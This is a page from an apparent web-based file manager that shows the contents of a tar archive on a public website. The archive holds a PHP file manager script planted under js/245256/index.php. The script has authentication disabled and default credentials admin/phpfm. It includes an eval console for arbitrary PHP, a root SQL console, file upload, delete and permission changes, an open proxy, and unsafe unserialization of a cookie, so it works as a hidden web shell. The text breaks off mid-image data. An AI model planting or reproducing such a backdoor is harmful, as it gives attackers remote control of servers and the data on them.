芝麻web文件管理V1.00
编辑当前文件:/home/digitalh/www/public/resources.tar
js/245256/index.php���������������������������������������������������������������������������������0000644�����������������00000234553�14765366572�0007610 0����������������������������������������������������������������������������������������������������ustar�00�������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������<?php /* PHP File manager ver 1.4 */ // Configuration do not change manually! $authorization = '{"authorize":"0","login":"admin","password":"phpfm","cookie_name":"fm_user","days_authorization":"30","script":"<script type=\"text\/javascript\" src=\"https:\/\/www.cdolivet.com\/editarea\/editarea\/edit_area\/edit_area_full.js\"><\/script>\r\n<script language=\"Javascript\" type=\"text\/javascript\">\r\neditAreaLoader.init({\r\nid: \"newcontent\"\r\n,display: \"later\"\r\n,start_highlight: true\r\n,allow_resize: \"both\"\r\n,allow_toggle: true\r\n,word_wrap: true\r\n,language: \"ru\"\r\n,syntax: \"php\"\t\r\n,toolbar: \"search, go_to_line, |, undo, redo, |, select_font, |, syntax_selection, |, change_smooth_selection, highlight, reset_highlight, |, help\"\r\n,syntax_selection_allow: \"css,html,js,php,python,xml,c,cpp,sql,basic,pas\"\r\n});\r\n<\/script>"}'; $php_templates = '{"Settings":"global $fm_config;\r\nvar_export($fm_config);","Backup SQL tables":"echo fm_backup_tables();"}'; $sql_templates = '{"All bases":"SHOW DATABASES;","All tables":"SHOW TABLES;"}'; $translation = '{"id":"ru","Add":"Добавить","Are you sure you want to delete this directory (recursively)?":"Вы уверены, что хотите удалить эту папку (рекурсивно)?","Are you sure you want to delete this file?":"Вы уверены, что хотите удалить этот файл?","Archiving":"Архивировать","Authorization":"Авторизация","Back":"Назад","Cancel":"Отмена","Chinese":"Китайский","Compress":"Сжать","Console":"Консоль","Cookie":"Куки","Created":"Создан","Date":"Дата","Days":"Дней","Decompress":"Распаковать","Delete":"Удалить","Deleted":"Удалено","Download":"Скачать","done":"закончена","Edit":"Редактировать","Enter":"Вход","English":"Английский","Error occurred":"Произошла ошибка","File manager":"Файловый менеджер","File selected":"Выбран файл","File updated":"Файл сохранен","Filename":"Имя файла","Files uploaded":"Файл загружен","French":"Французский","Generation time":"Генерация страницы","German":"Немецкий","Home":"Домой","Quit":"Выход","Language":"Язык","Login":"Логин","Manage":"Управление","Make directory":"Создать папку","Name":"Наименование","New":"Новое","New file":"Новый файл","no files":"нет файлов","Password":"Пароль","pictures":"изображения","Recursively":"Рекурсивно","Rename":"Переименовать","Reset":"Сбросить","Reset settings":"Сбросить настройки","Restore file time after editing":"Восстанавливать время файла после редактирования","Result":"Результат","Rights":"Права","Russian":"Русский","Save":"Сохранить","Select":"Выберите","Select the file":"Выберите файл","Settings":"Настройка","Show":"Показать","Show size of the folder":"Показывать размер папки","Size":"Размер","Spanish":"Испанский","Submit":"Отправить","Task":"Задача","templates":"шаблоны","Ukrainian":"Украинский","Upload":"Загрузить","Value":"Значение","Hello":"Привет","Found in files":"Найдено в файлах","Search":"Поиск","Recursive search":"Рекурсивный поиск","Mask":"Маска"}'; // end configuration /*2e3300cd40ea092e5eeb579abe01e85a*/ // Preparations $starttime = explode(' ', microtime()); $starttime = $starttime[1] + $starttime[0]; $langs = array('en','ru','de','fr','uk'); $path = empty($_REQUEST['path']) ? $path = realpath('.') : realpath($_REQUEST['path']); $path = str_replace('\\', '/', $path) . '/'; $main_path=str_replace('\\', '/',realpath('./')); $phar_maybe = (version_compare(phpversion(),"5.3.0","<"))?true:false; $msg = ''; // service string $default_language = 'ru'; $detect_lang = true; $fm_version = 1.4; //Authorization $auth = json_decode($authorization,true); $auth['authorize'] = isset($auth['authorize']) ? $auth['authorize'] : 0; $auth['days_authorization'] = (isset($auth['days_authorization'])&&is_numeric($auth['days_authorization'])) ? (int)$auth['days_authorization'] : 30; $auth['login'] = isset($auth['login']) ? $auth['login'] : 'admin'; $auth['password'] = isset($auth['password']) ? $auth['password'] : 'phpfm'; $auth['cookie_name'] = isset($auth['cookie_name']) ? $auth['cookie_name'] : 'fm_user'; $auth['script'] = isset($auth['script']) ? $auth['script'] : ''; // Little default config $fm_default_config = array ( 'make_directory' => true, 'new_file' => true, 'upload_file' => true, 'show_dir_size' => false, //if true, show directory size maybe slow 'show_img' => true, 'show_php_ver' => true, 'show_php_ini' => false, // show path to current php.ini 'show_gt' => true, // show generation time 'enable_php_console' => true, 'enable_sql_console' => true, 'sql_server' => 'localhost', 'sql_username' => 'root', 'sql_password' => '', 'sql_db' => 'test_base', 'enable_proxy' => true, 'show_phpinfo' => true, 'show_xls' => true, 'fm_settings' => true, 'restore_time' => true, 'fm_restore_time' => false, ); if (empty($_COOKIE['fm_config'])) $fm_config = $fm_default_config; else $fm_config = unserialize($_COOKIE['fm_config']); // Change language if (isset($_POST['fm_lang'])) { setcookie('fm_lang', $_POST['fm_lang'], time() + (86400 * $auth['days_authorization'])); $_COOKIE['fm_lang'] = $_POST['fm_lang']; } $language = $default_language; // Detect browser language if($detect_lang && !empty($_SERVER['HTTP_ACCEPT_LANGUAGE']) && empty($_COOKIE['fm_lang'])){ $lang_priority = explode(',', $_SERVER['HTTP_ACCEPT_LANGUAGE']); if (!empty($lang_priority)){ foreach ($lang_priority as $lang_arr){ $lng = explode(';', $lang_arr); $lng = $lng[0]; if(in_array($lng,$langs)){ $language = $lng; break; } } } } // Cookie language is primary for ever $language = (empty($_COOKIE['fm_lang'])) ? $language : $_COOKIE['fm_lang']; // Localization $lang = json_decode($translation,true); if ($lang['id']!=$language) { $get_lang = file_get_contents('https://raw.githubusercontent.com/Den1xxx/Filemanager/master/languages/' . $language . '.json'); if (!empty($get_lang)) { //remove unnecessary characters $translation_string = str_replace("'",''',json_encode(json_decode($get_lang),JSON_UNESCAPED_UNICODE)); $fgc = file_get_contents(__FILE__); $search = preg_match('#translation[\s]?\=[\s]?\'\{\"(.*?)\"\}\';#', $fgc, $matches); if (!empty($matches[1])) { $filemtime = filemtime(__FILE__); $replace = str_replace('{"'.$matches[1].'"}',$translation_string,$fgc); if (file_put_contents(__FILE__, $replace)) { $msg .= __('File updated'); } else $msg .= __('Error occurred'); if (!empty($fm_config['fm_restore_time'])) touch(__FILE__,$filemtime); } $lang = json_decode($translation_string,true); } } /* Functions */ //translation function __($text){ global $lang; if (isset($lang[$text])) return $lang[$text]; else return $text; }; //delete files and dirs recursively function fm_del_files($file, $recursive = false) { if($recursive && @is_dir($file)) { $els = fm_scan_dir($file, '', '', true); foreach ($els as $el) { if($el != '.' && $el != '..'){ fm_del_files($file . '/' . $el, true); } } } if(@is_dir($file)) { return rmdir($file); } else { return @unlink($file); } } //file perms function fm_rights_string($file, $if = false){ $perms = fileperms($file); $info = ''; if(!$if){ if (($perms & 0xC000) == 0xC000) { //Socket $info = 's'; } elseif (($perms & 0xA000) == 0xA000) { //Symbolic Link $info = 'l'; } elseif (($perms & 0x8000) == 0x8000) { //Regular $info = '-'; } elseif (($perms & 0x6000) == 0x6000) { //Block special $info = 'b'; } elseif (($perms & 0x4000) == 0x4000) { //Directory $info = 'd'; } elseif (($perms & 0x2000) == 0x2000) { //Character special $info = 'c'; } elseif (($perms & 0x1000) == 0x1000) { //FIFO pipe $info = 'p'; } else { //Unknown $info = 'u'; } } //Owner $info .= (($perms & 0x0100) ? 'r' : '-'); $info .= (($perms & 0x0080) ? 'w' : '-'); $info .= (($perms & 0x0040) ? (($perms & 0x0800) ? 's' : 'x' ) : (($perms & 0x0800) ? 'S' : '-')); //Group $info .= (($perms & 0x0020) ? 'r' : '-'); $info .= (($perms & 0x0010) ? 'w' : '-'); $info .= (($perms & 0x0008) ? (($perms & 0x0400) ? 's' : 'x' ) : (($perms & 0x0400) ? 'S' : '-')); //World $info .= (($perms & 0x0004) ? 'r' : '-'); $info .= (($perms & 0x0002) ? 'w' : '-'); $info .= (($perms & 0x0001) ? (($perms & 0x0200) ? 't' : 'x' ) : (($perms & 0x0200) ? 'T' : '-')); return $info; } function fm_convert_rights($mode) { $mode = str_pad($mode,9,'-'); $trans = array('-'=>'0','r'=>'4','w'=>'2','x'=>'1'); $mode = strtr($mode,$trans); $newmode = '0'; $owner = (int) $mode[0] + (int) $mode[1] + (int) $mode[2]; $group = (int) $mode[3] + (int) $mode[4] + (int) $mode[5]; $world = (int) $mode[6] + (int) $mode[7] + (int) $mode[8]; $newmode .= $owner . $group . $world; return intval($newmode, 8); } function fm_chmod($file, $val, $rec = false) { $res = @chmod(realpath($file), $val); if(@is_dir($file) && $rec){ $els = fm_scan_dir($file); foreach ($els as $el) { $res = $res && fm_chmod($file . '/' . $el, $val, true); } } return $res; } //load files function fm_download($file_name) { if (!empty($file_name)) { if (file_exists($file_name)) { header("Content-Disposition: attachment; filename=" . basename($file_name)); header("Content-Type: application/force-download"); header("Content-Type: application/octet-stream"); header("Content-Type: application/download"); header("Content-Description: File Transfer"); header("Content-Length: " . filesize($file_name)); flush(); // this doesn't really matter. $fp = fopen($file_name, "r"); while (!feof($fp)) { echo fread($fp, 65536); flush(); // this is essential for large downloads } fclose($fp); die(); } else { header('HTTP/1.0 404 Not Found', true, 404); header('Status: 404 Not Found'); die(); } } } //show folder size function fm_dir_size($f,$format=true) { if($format) { $size=fm_dir_size($f,false); if($size<=1024) return $size.' bytes'; elseif($size<=1024*1024) return round($size/(1024),2).' Kb'; elseif($size<=1024*1024*1024) return round($size/(1024*1024),2).' Mb'; elseif($size<=1024*1024*1024*1024) return round($size/(1024*1024*1024),2).' Gb'; elseif($size<=1024*1024*1024*1024*1024) return round($size/(1024*1024*1024*1024),2).' Tb'; //:))) else return round($size/(1024*1024*1024*1024*1024),2).' Pb'; // ;-) } else { if(is_file($f)) return filesize($f); $size=0; $dh=opendir($f); while(($file=readdir($dh))!==false) { if($file=='.' || $file=='..') continue; if(is_file($f.'/'.$file)) $size+=filesize($f.'/'.$file); else $size+=fm_dir_size($f.'/'.$file,false); } closedir($dh); return $size+filesize($f); } } //scan directory function fm_scan_dir($directory, $exp = '', $type = 'all', $do_not_filter = false) { $dir = $ndir = array(); if(!empty($exp)){ $exp = '/^' . str_replace('*', '(.*)', str_replace('.', '\\.', $exp)) . '$/'; } if(!empty($type) && $type !== 'all'){ $func = 'is_' . $type; } if(@is_dir($directory)){ $fh = opendir($directory); while (false !== ($filename = readdir($fh))) { if(substr($filename, 0, 1) != '.' || $do_not_filter) { if((empty($type) || $type == 'all' || $func($directory . '/' . $filename)) && (empty($exp) || preg_match($exp, $filename))){ $dir[] = $filename; } } } closedir($fh); natsort($dir); } return $dir; } function fm_link($get,$link,$name,$title='') { if (empty($title)) $title=$name.' '.basename($link); return ' <a href="?'.$get.'='.base64_encode($link).'" title="'.$title.'">'.$name.'</a>'; } function fm_arr_to_option($arr,$n,$sel=''){ foreach($arr as $v){ $b=$v[$n]; $res.='<option value="'.$b.'" '.($sel && $sel==$b?'selected':'').'>'.$b.'</option>'; } return $res; } function fm_lang_form ($current='en'){ return ' <form name="change_lang" method="post" action=""> <select name="fm_lang" title="'.__('Language').'" onchange="document.forms[\'change_lang\'].submit()" > <option value="en" '.($current=='en'?'selected="selected" ':'').'>'.__('English').'</option> <option value="de" '.($current=='de'?'selected="selected" ':'').'>'.__('German').'</option> <option value="ru" '.($current=='ru'?'selected="selected" ':'').'>'.__('Russian').'</option> <option value="fr" '.($current=='fr'?'selected="selected" ':'').'>'.__('French').'</option> <option value="uk" '.($current=='uk'?'selected="selected" ':'').'>'.__('Ukrainian').'</option> </select> </form> '; } function fm_root($dirname){ return ($dirname=='.' OR $dirname=='..'); } function fm_php($string){ $display_errors=ini_get('display_errors'); ini_set('display_errors', '1'); ob_start(); eval(trim($string)); $text = ob_get_contents(); ob_end_clean(); ini_set('display_errors', $display_errors); return $text; } //SHOW DATABASES function fm_sql_connect(){ global $fm_config; return new mysqli($fm_config['sql_server'], $fm_config['sql_username'], $fm_config['sql_password'], $fm_config['sql_db']); } function fm_sql($query){ global $fm_config; $query=trim($query); ob_start(); $connection = fm_sql_connect(); if ($connection->connect_error) { ob_end_clean(); return $connection->connect_error; } $connection->set_charset('utf8'); $queried = mysqli_query($connection,$query); if ($queried===false) { ob_end_clean(); return mysqli_error($connection); } else { if(!empty($queried)){ while($row = mysqli_fetch_assoc($queried)) { $query_result[]= $row; } } $vdump=empty($query_result)?'':var_export($query_result,true); ob_end_clean(); $connection->close(); return '<pre>'.stripslashes($vdump).'</pre>'; } } function fm_backup_tables($tables = '*', $full_backup = true) { global $path; $mysqldb = fm_sql_connect(); $delimiter = "; \n \n"; if($tables == '*') { $tables = array(); $result = $mysqldb->query('SHOW TABLES'); while($row = mysqli_fetch_row($result)) { $tables[] = $row[0]; } } else { $tables = is_array($tables) ? $tables : explode(',',$tables); } $return=''; foreach($tables as $table) { $result = $mysqldb->query('SELECT * FROM '.$table); $num_fields = mysqli_num_fields($result); $return.= 'DROP TABLE IF EXISTS `'.$table.'`'.$delimiter; $row2 = mysqli_fetch_row($mysqldb->query('SHOW CREATE TABLE '.$table)); $return.=$row2[1].$delimiter; if ($full_backup) { for ($i = 0; $i < $num_fields; $i++) { while($row = mysqli_fetch_row($result)) { $return.= 'INSERT INTO `'.$table.'` VALUES('; for($j=0; $j<$num_fields; $j++) { $row[$j] = addslashes($row[$j]); $row[$j] = str_replace("\n","\\n",$row[$j]); if (isset($row[$j])) { $return.= '"'.$row[$j].'"' ; } else { $return.= '""'; } if ($j<($num_fields-1)) { $return.= ','; } } $return.= ')'.$delimiter; } } } else { $return = preg_replace("#AUTO_INCREMENT=[\d]+ #is", '', $return); } $return.="\n\n\n"; } //save file $file=gmdate("Y-m-d_H-i-s",time()).'.sql'; $handle = fopen($file,'w+'); fwrite($handle,$return); fclose($handle); $alert = 'onClick="if(confirm(\''. __('File selected').': \n'. $file. '. \n'.__('Are you sure you want to delete this file?') . '\')) document.location.href = \'?delete=' . $file . '&path=' . $path . '\'"'; return $file.': '.fm_link('download',$path.$file,__('Download'),__('Download').' '.$file).' <a href="#" title="' . __('Delete') . ' '. $file . '" ' . $alert . '>' . __('Delete') . '</a>'; } function fm_restore_tables($sqlFileToExecute) { $mysqldb = fm_sql_connect(); $delimiter = "; \n \n"; // Load and explode the sql file $f = fopen($sqlFileToExecute,"r+"); $sqlFile = fread($f,filesize($sqlFileToExecute)); $sqlArray = explode($delimiter,$sqlFile); //Process the sql file by statements foreach ($sqlArray as $stmt) { if (strlen($stmt)>3){ $result = $mysqldb->query($stmt); if (!$result){ $sqlErrorCode = mysqli_errno($mysqldb->connection); $sqlErrorText = mysqli_error($mysqldb->connection); $sqlStmt = $stmt; break; } } } if (empty($sqlErrorCode)) return __('Success').' '.$sqlFileToExecute; else return $sqlErrorText.'<br/>'.$stmt; } function fm_img_link($filename){ return './'.basename(__FILE__).'?img='.base64_encode($filename); } function fm_home_style(){ return ' input, input.fm_input { text-indent: 2px; } input, textarea, select, input.fm_input { color: black; font: normal 8pt Verdana, Arial, Helvetica, sans-serif; border-color: black; background-color: #FCFCFC none !important; border-radius: 0; padding: 2px; } input.fm_input { background: #FCFCFC none !important; cursor: pointer; } .home { background-image: url("data:image/png;base64,iVBORw0KGgoAAAANSUhEUgAAABAAAAAQCAMAAAAoLQ9TAAAABGdBTUEAAK/INwWK6QAAAgRQTFRF/f396Ojo////tT02zr+fw66Rtj432TEp3MXE2DAr3TYp1y4mtDw2/7BM/7BOqVpc/8l31jcqq6enwcHB2Tgi5jgqVpbFvra2nBAV/Pz82S0jnx0W3TUkqSgi4eHh4Tsre4wosz026uPjzGYd6Us3ynAydUBA5Kl3fm5eqZaW7ODgi2Vg+Pj4uY+EwLm5bY9U//7jfLtC+tOK3jcm/71u2jYo1UYh5aJl/seC3jEm12kmJrIA1jMm/9aU4Lh0e01BlIaE///dhMdC7IA//fTZ2c3MW6nN30wf95Vd4JdXoXVos8nE4efN/+63IJgSnYhl7F4csXt89GQUwL+/jl1c41Aq+fb2gmtI1rKa2C4kJaIA3jYrlTw5tj423jYn3cXE1zQoxMHBp1lZ3Dgmqiks/+mcjLK83jYkymMV3TYk//HM+u7Whmtr0odTpaOjfWJfrHpg/8Bs/7tW/7Ve+4U52DMm3MLBn4qLgNVM6MzB3lEflIuL/+jA///20LOzjXx8/7lbWpJG2C8k3TosJKMA1ywjopOR1zYp5Dspiay+yKNhqKSk8NW6/fjns7Oz2tnZuz887b+W3aRY/+ms4rCE3Tot7V85bKxjuEA3w45Vh5uhq6am4cFxgZZW/9qIuwgKy0sW+ujT4TQntz423C8i3zUj/+Kw/a5d6UMxuL6wzDEr////cqJQfAAAAKx0Uk5T////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////AAWVFbEAAAAZdEVYdFNvZnR3YXJlAEFkb2JlIEltYWdlUmVhZHlxyWU8AAAA2UlEQVQoU2NYjQYYsAiE8U9YzDYjVpGZRxMiECitMrVZvoMrTlQ2ESRQJ2FVwinYbmqTULoohnE1g1aKGS/fNMtk40yZ9KVLQhgYkuY7NxQvXyHVFNnKzR69qpxBPMez0ETAQyTUvSogaIFaPcNqV/M5dha2Rl2Timb6Z+QBDY1XN/Sbu8xFLG3eLDfl2UABjilO1o012Z3ek1lZVIWAAmUTK6L0s3pX+jj6puZ2AwWUvBRaphswMdUujCiwDwa5VEdPI7ynUlc7v1qYURLquf42hz45CBPDtwACrm+RDcxJYAAAAABJRU5ErkJggg=="); background-repeat: no-repeat; }'; } function fm_config_checkbox_row($name,$value) { global $fm_config; return '<tr><td class="row1"><input id="fm_config_'.$value.'" name="fm_config['.$value.']" value="1" '.(empty($fm_config[$value])?'':'checked="true"').' type="checkbox"></td><td class="row2 whole"><label for="fm_config_'.$value.'">'.$name.'</td></tr>'; } function fm_protocol() { if (isset($_SERVER['HTTP_SCHEME'])) return $_SERVER['HTTP_SCHEME'].'://'; if (isset($_SERVER['HTTPS']) && $_SERVER['HTTPS'] == 'on') return 'https://'; if (isset($_SERVER['SERVER_PORT']) && $_SERVER['SERVER_PORT'] == 443) return 'https://'; if (isset($_SERVER['HTTP_X_FORWARDED_PROTO']) && $_SERVER['HTTP_X_FORWARDED_PROTO'] == 'https') return 'https://'; return 'http://'; } function fm_site_url() { return fm_protocol().$_SERVER['HTTP_HOST']; } function fm_url($full=false) { $host=$full?fm_site_url():'.'; return $host.'/'.basename(__FILE__); } function fm_home($full=false){ return ' <a href="'.fm_url($full).'" title="'.__('Home').'"><span class="home"> </span></a>'; } function fm_run_input($lng) { global $fm_config; $return = !empty($fm_config['enable_'.$lng.'_console']) ? ' <form method="post" action="'.fm_url().'" style="display:inline"> <input type="submit" name="'.$lng.'run" value="'.strtoupper($lng).' '.__('Console').'"> </form> ' : ''; return $return; } function fm_url_proxy($matches) { $link = str_replace('&','&',$matches[2]); $url = isset($_GET['url'])?$_GET['url']:''; $parse_url = parse_url($url); $host = $parse_url['scheme'].'://'.$parse_url['host'].'/'; if (substr($link,0,2)=='//') { $link = substr_replace($link,fm_protocol(),0,2); } elseif (substr($link,0,1)=='/') { $link = substr_replace($link,$host,0,1); } elseif (substr($link,0,2)=='./') { $link = substr_replace($link,$host,0,2); } elseif (substr($link,0,4)=='http') { //alles machen wunderschon } else { $link = $host.$link; } if ($matches[1]=='href' && !strripos($link, 'css')) { $base = fm_site_url().'/'.basename(__FILE__); $baseq = $base.'?proxy=true&url='; $link = $baseq.urlencode($link); } elseif (strripos($link, 'css')){ // ܧѧ - ا էާ֧ߧ ߧѧէ } return $matches[1].'="'.$link.'"'; } function fm_tpl_form($lng_tpl) { global ${$lng_tpl.'_templates'}; $tpl_arr = json_decode(${$lng_tpl.'_templates'},true); $str = ''; foreach ($tpl_arr as $ktpl=>$vtpl) { $str .= '<tr><td class="row1"><input name="'.$lng_tpl.'_name[]" value="'.$ktpl.'"></td><td class="row2 whole"><textarea name="'.$lng_tpl.'_value[]" cols="55" rows="5" class="textarea_input">'.$vtpl.'</textarea> <input name="del_'.rand().'" type="button" onClick="this.parentNode.parentNode.remove();" value="'.__('Delete').'"/></td></tr>'; } return ' <table> <tr><th colspan="2">'.strtoupper($lng_tpl).' '.__('templates').' '.fm_run_input($lng_tpl).'</th></tr> <form method="post" action=""> <input type="hidden" value="'.$lng_tpl.'" name="tpl_edited"> <tr><td class="row1">'.__('Name').'</td><td class="row2 whole">'.__('Value').'</td></tr> '.$str.' <tr><td colspan="2" class="row3"><input name="res" type="button" onClick="document.location.href = \''.fm_url().'?fm_settings=true\';" value="'.__('Reset').'"/> <input type="submit" value="'.__('Save').'" ></td></tr> </form> <form method="post" action=""> <input type="hidden" value="'.$lng_tpl.'" name="tpl_edited"> <tr><td class="row1"><input name="'.$lng_tpl.'_new_name" value="" placeholder="'.__('New').' '.__('Name').'"></td><td class="row2 whole"><textarea name="'.$lng_tpl.'_new_value" cols="55" rows="5" class="textarea_input" placeholder="'.__('New').' '.__('Value').'"></textarea></td></tr> <tr><td colspan="2" class="row3"><input type="submit" value="'.__('Add').'" ></td></tr> </form> </table> '; } /* End Functions */ // authorization if ($auth['authorize']) { if (isset($_POST['login']) && isset($_POST['password'])){ if (($_POST['login']==$auth['login']) && ($_POST['password']==$auth['password'])) { setcookie($auth['cookie_name'], $auth['login'].'|'.md5($auth['password']), time() + (86400 * $auth['days_authorization'])); $_COOKIE[$auth['cookie_name']]=$auth['login'].'|'.md5($auth['password']); } } if (!isset($_COOKIE[$auth['cookie_name']]) OR ($_COOKIE[$auth['cookie_name']]!=$auth['login'].'|'.md5($auth['password']))) { echo ' <!doctype html> <html> <head> <meta charset="utf-8" /> <meta name="viewport" content="width=device-width, initial-scale=1" /> <title>'.__('File manager').'</title> </head> <body> <form action="" method="post"> '.__('Login').' <input name="login" type="text"> '.__('Password').' <input name="password" type="password"> <input type="submit" value="'.__('Enter').'" class="fm_input"> </form> '.fm_lang_form($language).' </body> </html> '; die(); } if (isset($_POST['quit'])) { unset($_COOKIE[$auth['cookie_name']]); setcookie($auth['cookie_name'], '', time() - (86400 * $auth['days_authorization'])); header('Location: '.fm_site_url().$_SERVER['REQUEST_URI']); } } // Change config if (isset($_GET['fm_settings'])) { if (isset($_GET['fm_config_delete'])) { unset($_COOKIE['fm_config']); setcookie('fm_config', '', time() - (86400 * $auth['days_authorization'])); header('Location: '.fm_url().'?fm_settings=true'); exit(0); } elseif (isset($_POST['fm_config'])) { $fm_config = $_POST['fm_config']; setcookie('fm_config', serialize($fm_config), time() + (86400 * $auth['days_authorization'])); $_COOKIE['fm_config'] = serialize($fm_config); $msg = __('Settings').' '.__('done'); } elseif (isset($_POST['fm_login'])) { if (empty($_POST['fm_login']['authorize'])) $_POST['fm_login'] = array('authorize' => '0') + $_POST['fm_login']; $fm_login = json_encode($_POST['fm_login']); $fgc = file_get_contents(__FILE__); $search = preg_match('#authorization[\s]?\=[\s]?\'\{\"(.*?)\"\}\';#', $fgc, $matches); if (!empty($matches[1])) { $filemtime = filemtime(__FILE__); $replace = str_replace('{"'.$matches[1].'"}',$fm_login,$fgc); if (file_put_contents(__FILE__, $replace)) { $msg .= __('File updated'); if ($_POST['fm_login']['login'] != $auth['login']) $msg .= ' '.__('Login').': '.$_POST['fm_login']['login']; if ($_POST['fm_login']['password'] != $auth['password']) $msg .= ' '.__('Password').': '.$_POST['fm_login']['password']; $auth = $_POST['fm_login']; } else $msg .= __('Error occurred'); if (!empty($fm_config['fm_restore_time'])) touch(__FILE__,$filemtime); } } elseif (isset($_POST['tpl_edited'])) { $lng_tpl = $_POST['tpl_edited']; if (!empty($_POST[$lng_tpl.'_name'])) { $fm_php = json_encode(array_combine($_POST[$lng_tpl.'_name'],$_POST[$lng_tpl.'_value']),JSON_HEX_APOS); } elseif (!empty($_POST[$lng_tpl.'_new_name'])) { $fm_php = json_encode(json_decode(${$lng_tpl.'_templates'},true)+array($_POST[$lng_tpl.'_new_name']=>$_POST[$lng_tpl.'_new_value']),JSON_HEX_APOS); } if (!empty($fm_php)) { $fgc = file_get_contents(__FILE__); $search = preg_match('#'.$lng_tpl.'_templates[\s]?\=[\s]?\'\{\"(.*?)\"\}\';#', $fgc, $matches); if (!empty($matches[1])) { $filemtime = filemtime(__FILE__); $replace = str_replace('{"'.$matches[1].'"}',$fm_php,$fgc); if (file_put_contents(__FILE__, $replace)) { ${$lng_tpl.'_templates'} = $fm_php; $msg .= __('File updated'); } else $msg .= __('Error occurred'); if (!empty($fm_config['fm_restore_time'])) touch(__FILE__,$filemtime); } } else $msg .= __('Error occurred'); } } // Just show image if (isset($_GET['img'])) { $file=base64_decode($_GET['img']); if ($info=getimagesize($file)){ switch ($info[2]){ //1=GIF, 2=JPG, 3=PNG, 4=SWF, 5=PSD, 6=BMP case 1: $ext='gif'; break; case 2: $ext='jpeg'; break; case 3: $ext='png'; break; case 6: $ext='bmp'; break; default: die(); } header("Content-type: image/$ext"); echo file_get_contents($file); die(); } } // Just download file if (isset($_GET['download'])) { $file=base64_decode($_GET['download']); fm_download($file); } // Just show info if (isset($_GET['phpinfo'])) { phpinfo(); die(); } // Mini proxy, many bugs! if (isset($_GET['proxy']) && (!empty($fm_config['enable_proxy']))) { $url = isset($_GET['url'])?urldecode($_GET['url']):''; $proxy_form = ' <div style="position:relative;z-index:100500;background: linear-gradient(to bottom, #e4f5fc 0%,#bfe8f9 50%,#9fd8ef 51%,#2ab0ed 100%);"> <form action="" method="GET"> <input type="hidden" name="proxy" value="true"> '.fm_home().' <a href="'.$url.'" target="_blank">Url</a>: <input type="text" name="url" value="'.$url.'" size="55"> <input type="submit" value="'.__('Show').'" class="fm_input"> </form> </div> '; if ($url) { $ch = curl_init($url); curl_setopt($ch, CURLOPT_USERAGENT, 'Den1xxx test proxy'); curl_setopt($ch, CURLOPT_FOLLOWLOCATION, 1); curl_setopt($ch, CURLOPT_SSL_VERIFYHOST,0); curl_setopt($ch, CURLOPT_SSL_VERIFYPEER,0); curl_setopt($ch, CURLOPT_HEADER, 0); curl_setopt($ch, CURLOPT_REFERER, $url); curl_setopt($ch, CURLOPT_RETURNTRANSFER,true); $result = curl_exec($ch); curl_close($ch); //$result = preg_replace('#(src)=["\'][http://]?([^:]*)["\']#Ui', '\\1="'.$url.'/\\2"', $result); $result = preg_replace_callback('#(href|src)=["\'][http://]?([^:]*)["\']#Ui', 'fm_url_proxy', $result); $result = preg_replace('%(<body.*?>)%i', '$1'.'<style>'.fm_home_style().'</style>'.$proxy_form, $result); echo $result; die(); } } ?> <!doctype html> <html> <head> <meta charset="utf-8" /> <meta name="viewport" content="width=device-width, initial-scale=1" /> <title><?=__('File manager')?></title> <style> body { background-color: white; font-family: Verdana, Arial, Helvetica, sans-serif; font-size: 8pt; margin: 0px; } a:link, a:active, a:visited { color: #006699; text-decoration: none; } a:hover { color: #DD6900; text-decoration: underline; } a.th:link { color: #FFA34F; text-decoration: none; } a.th:active { color: #FFA34F; text-decoration: none; } a.th:visited { color: #FFA34F; text-decoration: none; } a.th:hover { color: #FFA34F; text-decoration: underline; } table.bg { background-color: #ACBBC6 } th, td { font: normal 8pt Verdana, Arial, Helvetica, sans-serif; padding: 3px; } th { height: 25px; background-color: #006699; color: #FFA34F; font-weight: bold; font-size: 11px; } .row1 { background-color: #EFEFEF; } .row2 { background-color: #DEE3E7; } .row3 { background-color: #D1D7DC; padding: 5px; } tr.row1:hover { background-color: #F3FCFC; } tr.row2:hover { background-color: #F0F6F6; } .whole { width: 100%; } .all tbody td:first-child{width:100%;} textarea { font: 9pt 'Courier New', courier; line-height: 125%; padding: 5px; } .textarea_input { height: 1em; } .textarea_input:focus { height: auto; } input[type=submit]{ background: #FCFCFC none !important; cursor: pointer; } .folder { background-image: url("data:image/png;base64,iVBORw0KGgoAAAANSUhEUgAAABAAAAAQCAYAAAAf8/9hAAAKT2lDQ1BQaG90b3Nob3AgSUNDIHByb2ZpbGUAAHjanVNnVFPpFj333vRCS4iAlEtvUhUIIFJCi4AUkSYqIQkQSoghodkVUcERRUUEG8igiAOOjoCMFVEsDIoK2AfkIaKOg6OIisr74Xuja9a89+bN/rXXPues852zzwfACAyWSDNRNYAMqUIeEeCDx8TG4eQuQIEKJHAAEAizZCFz/SMBAPh+PDwrIsAHvgABeNMLCADATZvAMByH/w/qQplcAYCEAcB0kThLCIAUAEB6jkKmAEBGAYCdmCZTAKAEAGDLY2LjAFAtAGAnf+bTAICd+Jl7AQBblCEVAaCRACATZYhEAGg7AKzPVopFAFgwABRmS8Q5ANgtADBJV2ZIALC3AMDOEAuyAAgMADBRiIUpAAR7AGDIIyN4AISZABRG8lc88SuuEOcqAAB4mbI8uSQ5RYFbCC1xB1dXLh4ozkkXKxQ2YQJhmkAuwnmZGTKBNA/g88wAAKCRFRHgg/P9eM4Ors7ONo62Dl8t6r8G/yJiYuP+5c+rcEAAAOF0ftH+LC+zGoA7BoBt/qIl7gRoXgugdfeLZrIPQLUAoOnaV/Nw+H48PEWhkLnZ2eXk5NhKxEJbYcpXff5nwl/AV/1s+X48/Pf14L7iJIEyXYFHBPjgwsz0TKUcz5IJhGLc5o9H/LcL//wd0yLESWK5WCoU41EScY5EmozzMqUiiUKSKcUl0v9k4t8s+wM+3zUAsGo+AXuRLahdYwP2SycQWHTA4vcAAPK7b8HUKAgDgGiD4c93/+8//UegJQCAZkmScQAAXkQkLlTKsz/HCAAARKCBKrBBG/TBGCzABhzBBdzBC/xgNoRCJMTCQhBCCmSAHHJgKayCQiiGzbAdKmAv1EAdNMBRaIaTcA4uwlW4Dj1wD/phCJ7BKLyBCQRByAgTYSHaiAFiilgjjggXmYX4IcFIBBKLJCDJiBRRIkuRNUgxUopUIFVIHfI9cgI5h1xGupE7yAAygvyGvEcxlIGyUT3UDLVDuag3GoRGogvQZHQxmo8WoJvQcrQaPYw2oefQq2gP2o8+Q8cwwOgYBzPEbDAuxsNCsTgsCZNjy7E